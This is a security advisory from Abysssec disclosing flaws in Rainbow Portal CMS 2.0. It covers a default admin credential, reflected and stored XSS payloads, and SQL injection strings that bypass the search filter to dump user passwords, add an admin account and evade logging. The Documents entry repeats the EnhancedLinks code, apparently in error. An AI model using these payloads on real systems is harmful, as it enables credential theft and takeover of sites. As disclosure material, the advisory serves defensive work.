Abysssec Research
1) Advisory information
| Title | Rainbowportal Multiple Remote Vulnerabilities |
| Version | Rainbow 2.0 Production/Stable (2.0.0.1881e) VS 2005 | VS 2008 .NET 2.0-3.5 |
| Discovery | http://www.abysssec.com |
| Vendor | http://www.rainbowportal.net |
| Impact | Ciritical |
| Contact | shahin [at] abysssec.com , info [at] abysssec.com |
| @abysssec |
2) Vulnerability Information
| Class | 1- Login Weakness 2- Non-persistent XSS 3- Persistent XSS 4- SQL Injection |
| Impact | A successful exploit can allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. |
| Remotely Exploitable | Yes |
| Locally Exploitable | No |
3) Vulnerabilities detail
1- Login Weakness:
You can Login to Rainbow with two ways:
1- Insert Email and Password
2- Insert UserID and Password
By default, the Rainbow Admin can login (with no encryption) to the CMS with: UserID=1, Password=Admin
Therefore, maybe you can login to Rainbow with 1 and Admin.
Vulnerable Code:
1 2 3 | in ../Rainbow/Security/Security.cs ln 473: usr = accountSystem.Login(uid, password, portalSettings.PortalID); |
2- Non-persistent XSS Vulnerabilities:
In these URLs, you can see the non-persistent XSS Vulnerabilities:
1 2 3 4 5 | http://Example.com/app_support/FCK.filemanager/imagegallery.aspx?1&"><script type="text/javascript">// <![CDATA[ alert(document.cookie) // ]]></script> (this page only accessible for Admin) |
1 2 3 4 5 6 7 | http://Example.com/aspnet_client/ELB/ELB_arrowButton.aspx?ctlID=0&chunkSize=200000000000002&hashCode=20&filterValue=<script type="text/javascript">// <![CDATA[ alert(123) // ]]></script>&filterType=20 (this page accessible for all users) Reason: the number: 200000000000002 is not an Int value. As a result an Error Accurred. |
At instances where you can create an error in the CMS, you can create an XSS with Error Page.
3-Persistent XSS Vulnerabilities:
In these modules, you can find persistent XSS where data is saved with no sanitization:
| 1- Module name : MileStones |
| Fields : Title, Status |
| Access URL : http://Example.com/DesktopModules/MileStones/MilestonesEdit.aspx?tabID=0&ItemID=1&Mid=2833 |
Vulnerable Code:
1 2 3 | In ../Rainbow/DesktopModules/Milestones/MilestonesEdit.aspx.cs ln 108: milestonesDb.AddMilestones(ItemID, ModuleID, PortalSettings.CurrentUser.Identity.Email, DateTime.Now, TitleField.Text, DateTime.Parse(EstCompleteDate.Text), StatusBox.Text); |
| 2- Module name : Contacts |
| Fields : Name, Role, Office, Mobile, Fax, Address |
| Access URL : http://Example.com/DesktopModules/Contacts/ContactsEdit.aspx?tabID=181&ItemID=1&mid=2837 |
Vulnerable Code:
1 2 3 | In ../Rainbow/DesktopModules/Contacts/ContactsEdit.aspx.cs ln 195: contacts.AddContact( ModuleID, ItemID, PortalSettings.CurrentUser.Identity.Email, NameField.Text, RoleField.Text, EmailField.Text, Contact1Field.Text, Contact2Field.Text, FaxField.Text, AddressField.Text); |
| 3- Module name: Blog |
| Fields : Title, Name, Comments |
| Access URL : http://Example.com/DesktopModules/Blog/BlogView.aspx?tabID=181&ItemID=1&mid=2824 |
Vulnerable Code:
1 2 3 4 | In ../Rainbow/DesktopModules/Blog/BlogView.aspx.cs ln 133: blogDB.AddBlogComment(ModuleID, ItemID, this.txtName.Text, this.txtTitle.Text, this.txtURL.Text, this.txtComments.Text); |
| 4- Module name : Announcements |
| Field : Title |
| Access URL : http://Example.com/DesktopModules/Announcements/AnnouncementsEdit.aspx?tabID=181&mID=2823 |
1 2 3 | In ../Rainbow/DesktopModules/Announcements/AnnouncementsEdit.aspx.cs ln 213: announcementDB.AddAnnouncement(ModuleID, ItemID, PortalSettings.CurrentUser.Identity.Email, TitleField.Text, DateTime.Parse(ExpireField.Text),DesktopText.Text, MoreLinkField.Text, MobileMoreField.Text); |
| 5- Module name : EnhancedLinks |
| Fields : Title, Description |
| Access URL : http://Example.com/DesktopModules/EnhancedLinks/EnhancedLinksEdit.aspx?tabID=181&mID=2820 |
Vulnerable Code:
1 2 3 | In ../Rainbow/DesktopModules/EnhancedLinks/EnhancedLinksEdit.aspx.cs ln 151: enhancedLinks.AddEnhancedLink(ModuleID, ItemID, PortalSettings.CurrentUser.Identity.Email, TitleField.Text, UrlField.Text, MobileUrlField.Text, Int32.Parse(ViewOrderField.Text), DescriptionField.Text, Src.Text, 0, TargetField.SelectedItem.Text); |
| 6- Module name : Documents |
| Fields : Filename, Category |
| Access URL : http://Example.com/DesktopModules/Documents/DocumentsEdit.aspx?tabID=0&ItemID=1&mid=2841 |
Vulnerable Code:
1 2 3 | In ../Rainbow/DesktopModules/EnhancedLinks/EnhancedLinksEdit.aspx.cs ln 151: enhancedLinks.AddEnhancedLink(ModuleID, ItemID, PortalSettings.CurrentUser.Identity.Email, TitleField.Text, UrlField.Text, MobileUrlField.Text, Int32.Parse(ViewOrderField.Text), DescriptionField.Text, Src.Text, 0, TargetField.SelectedItem.Text); |
4- SQL Injection Vulnerability:
This vulnerability exists in the (Search Site – via DB) module.
1 | In the Rainbow.Helpers.SearchDefinition class (../Rainbow/Helpers/SearchDefinition.cs) and in the SearchSqlSelect() function (ln 328), the body of query builds in the FilterString(searchStr) function (ln 305) and some words and letters blocks. Words like "select","char", "--", "'", ";" , etc . But no filter exist for "Union","Execute" , "sp_" , etc. |
Techniques that we use to bypass filtering are listed fallow:
1 2 3 4 5 6 7 8 9 10 11 | A keyword "AddExtraSQL:" IS used IN the query that allows you TO CREATE any query you prefer. This IS inborn logic OF the program. (ln 344) TO bypass ";" , "select" AND "--" filtering , we USE "s;e;l;e;c;t" AND ";-;-". The INPUT VALUE that you entered must be one expression but WITHOUT any spaces, so we USE "/**/" instead OF SPACE. Instead OF a DATE VALUE we USE "1/1/1900" Instead OF a UNIQUE identifier VALUE, we USE the NEWID() method that IS built IN TO SqlServer. TO evade logging, we USE "sp_password" IN query. |
As a result, you can input a value to bypass filters and access critical information from the database:
1 | AddExtraSQL:1=1/**/UNION/**/s;e;l;e;c;t/**/USER,@@version,USER,1,2,USER,1/1/1900,3,USER,NEWID(),USER;-;-/**/sp_password |
After that, the results will be shown in DataGrid in the page.
With another value, we can retrieve the information of users:
1 | AddExtraSQL:1=1/**/UNION/**/s;e;l;e;c;t/**/Name,Password,Email,UserID,2,Salt,1/1/1900,3,USER,NEWID(),USER/**/f;r;o;m/**/rb_users;-;-/**/sp_password |
The Email value is in the Abstract column and the Password is in the Title column. You can login to Rainbow with these values.
With another value like this, we can add an Admin user to the CMS with “rb_AddUser” stored procedure:
1 | AddExtraSQL:1=1/**/EXECUTE/**/dbo.rb_AddUser/**/0,"admin2","admin2@yahoo.com","admin2",NULL,NULL;-;-/**/sp_password |
To gain better results, while searching, you can just select “Announcements” from the Module ComboBox.